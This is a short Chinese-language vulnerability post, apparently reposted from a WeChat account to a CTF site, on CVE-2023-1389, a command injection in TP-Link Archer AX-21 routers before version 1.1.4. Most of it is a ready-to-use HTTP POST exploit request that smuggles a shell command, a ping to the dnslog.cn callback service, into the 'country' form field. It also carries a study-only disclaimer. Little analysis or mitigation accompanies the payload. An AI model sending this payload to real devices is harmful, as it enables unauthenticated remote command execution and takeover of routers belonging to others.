TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389

IoT 1个月前 admin
90 0 0

漏洞名称

TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389


漏洞复现

1、替换需要执行的命令

POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1Host: 1.1.1.1Content-Type: application/x-www-form-urlencoded
operation=write&country=$(`ping dnslog.cn`)

利用条件

TP-Link Archer AX-21 < 1.1.4

TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389


免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。


长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(巨黑科):TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389

版权声明:admin 发表于 2024年4月21日 上午8:01。
转载请注明:TP-Link Archer AX-21路由器 任意命令执行漏洞 CVE-2023-1389 | CTF导航

相关文章